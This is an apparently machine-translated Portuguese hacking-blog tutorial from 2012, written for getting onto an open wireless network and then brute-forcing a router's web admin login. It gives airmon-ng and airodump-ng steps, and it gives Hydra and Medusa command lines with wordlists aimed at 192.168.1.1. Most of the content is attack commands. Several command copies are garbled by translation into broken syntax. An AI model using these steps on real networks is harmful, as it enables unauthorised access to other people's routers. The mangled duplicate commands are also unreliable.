primeiro comando
airmon-ng airmon-ng start wlan0 ng airmon-start wlan0 airodump-ng mon0 -t opn airodump-ng opn mon0-t ficará assim: o segundo comando: ifconfig wlan0 down iwconfig wlan0 essid default channel 1 iwconfig wlan0 essid um canal padrão iwconfig ap 00:13 ifconfig wlan0 up ifconfig wlan0 up preste atenção na imagem você ira entender! Verificar a conexão iwconfig wlan0 iwconfig wlan0 Obter um endereço IP e gateway de seleção dhclient wlan0 dhclient wlan0 Antes de mais nada verifique os logins padroes do roteador caso não encontre você vai parar nessa pagina que esta na foto acima ----------------------------------------------------------------------------- Então caso tenha tentado e não tenha conseguido vamos la...você ira precisar de uma word list eu uso o dicionario do broffice muito bom. Começando Hydra para quebrar o login router / senha. -L specifiying the path to login list -L especificando o caminho para login lista -P specifying the path to password list -P especificando o caminho para a lista de senhas -t limiting the number of connections T limitar o número de conexões -e ns to check for no password and to check login as password ns-e para verificar se nenhuma senha e login para verificar como senha -f to stop when first login/password is found -F para parar quando primeiro login / password é encontrado -V to show each login/password attempt -V para mostrar cada login / tentativa de senha http-get to specify the protocol to use http-get para especificar o protocolo a ser usado /index.asp to point to the webpage it is heading to / Index.asp para apontar para a página que está indo para hydra 192.168.1.1 -L /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -V http-get /index.asp hydra 192.168.1.1-L / wordlists / login.txt-P / wordlists / ap_password.txt-1 e t-ns-f-V http-get / index.asp ----------------------------------------------------------------- --------------------------------------------------------------------- Para Medusa -H para especificar o host -U to specify path to the login wordlist -U para especificar o caminho para a wordlist login -P to specify path to password wordlist -P para especificar caminho para wordlist senha -t to limit the number of connections -T para limitar o número de conexões -f to stop the test on finding a valid login/password -F para parar o teste em encontrar um login / password -v for a more verbose output -V verbose para uma saída mais -M to specify the module to use -M para especificar o módulo para usar -m to specify the options for the module in use -M para especificar as opções para o módulo em uso medusa -h 192.168.1.1 -U /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -v 5 -M http -m DIR:GET/index.asp medusa-h 192.168.1.1-U / wordlists / login.txt-P / wordlists / ap_password.txt-1 e t-ns-f-v 5-M m DIR-http: GET / index.asp |
||||||||||||||||||||||
|
|
sábado, 7 de julho de 2012
Total de visualizações
142,339
Menu
- Android Hacking (11)
- Backdors (5)
- Backtrack (7)
- Cursos (9)
- Deface (8)
- Exploits (7)
- Ferramentas Cracker (7)
- Kali Linux (8)
- Linux (35)
- Metasploit (23)
- Noticias Hackers (17)
- Pentest (52)
- Pericia Forense Computacional (16)
- phishing (2)
- PHP Injection (1)
- Programaçao em geral (14)
- Rede (4)
- Security e Hacking (69)
- Sistemas Operacionais (7)
- Sql Injection (7)
- Tutoriais (78)
- Windows (3)
0 comentários:
Postar um comentário